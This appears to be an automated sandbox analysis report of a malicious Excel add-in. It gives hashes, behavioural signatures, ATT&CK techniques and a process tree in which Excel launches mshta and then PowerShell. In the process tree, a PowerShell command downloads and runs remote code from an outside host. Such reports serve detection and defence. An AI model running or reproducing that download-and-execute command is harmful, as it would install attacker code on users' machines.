Analysis

  • max time kernel
    137s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 07:59

General

  • Target

    393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056.xll

  • Size

    12KB

  • MD5

    460bd6d522b0a9a99015e763bff25ab6

  • SHA1

    cdaab1bf2071c7e71b2bd3c2a9ca83f94669eb3e

  • SHA256

    393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056

  • SHA512

    2d9f2b628fcb629b37ffa7fb848f1dfec3baac2a9ed66c4334ac7b9a9a7faf1d8ea813e62ad512340843bb5a815f10879e74522dc8451134c93d9b95b52294bb

  • SSDEEP

    192:L9L29RBzDzeobchBj8JONrONdHruYrEPEjr7Ahs:Ll29jnbcvYJOILLuYvr7Cs

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1316
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3156
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1532

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2IX84YPE\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056.xll
    Filesize

    12KB

    MD5

    460bd6d522b0a9a99015e763bff25ab6

    SHA1

    cdaab1bf2071c7e71b2bd3c2a9ca83f94669eb3e

    SHA256

    393210ac29ac4e5bba1583dbc831582f3148720daf3db9d04625abf2be4fd056

    SHA512

    2d9f2b628fcb629b37ffa7fb848f1dfec3baac2a9ed66c4334ac7b9a9a7faf1d8ea813e62ad512340843bb5a815f10879e74522dc8451134c93d9b95b52294bb

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcoq2gow.c5j.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1316-15-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-88-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-5-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-3-0x00007FF935B4D000-0x00007FF935B4E000-memory.dmp
    Filesize

    4KB

  • memory/1316-10-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-9-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-8-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-12-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-11-0x00007FF8F32D0000-0x00007FF8F32E0000-memory.dmp
    Filesize

    64KB

  • memory/1316-14-0x00007FF8F32D0000-0x00007FF8F32E0000-memory.dmp
    Filesize

    64KB

  • memory/1316-13-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-7-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-17-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-19-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-20-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-18-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-16-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-0-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-6-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-4-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-90-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1316-1-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-89-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-87-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-86-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-2-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
    Filesize

    64KB

  • memory/1316-70-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
    Filesize

    2.0MB

  • memory/1532-60-0x0000000005E90000-0x0000000005EAE000-memory.dmp
    Filesize

    120KB

  • memory/1532-61-0x0000000005ED0000-0x0000000005F1C000-memory.dmp
    Filesize

    304KB

  • memory/1532-62-0x0000000007700000-0x0000000007D7A000-memory.dmp
    Filesize

    6.5MB

  • memory/1532-63-0x00000000063A0000-0x00000000063BA000-memory.dmp
    Filesize

    104KB

  • memory/1532-59-0x00000000058C0000-0x0000000005C14000-memory.dmp
    Filesize

    3.3MB

  • memory/1532-49-0x0000000005850000-0x00000000058B6000-memory.dmp
    Filesize

    408KB

  • memory/1532-48-0x00000000057E0000-0x0000000005846000-memory.dmp
    Filesize

    408KB

  • memory/1532-47-0x0000000004FF0000-0x0000000005012000-memory.dmp
    Filesize

    136KB

  • memory/1532-45-0x0000000004900000-0x0000000004936000-memory.dmp
    Filesize

    216KB

  • memory/1532-46-0x00000000050C0000-0x00000000056E8000-memory.dmp
    Filesize

    6.2MB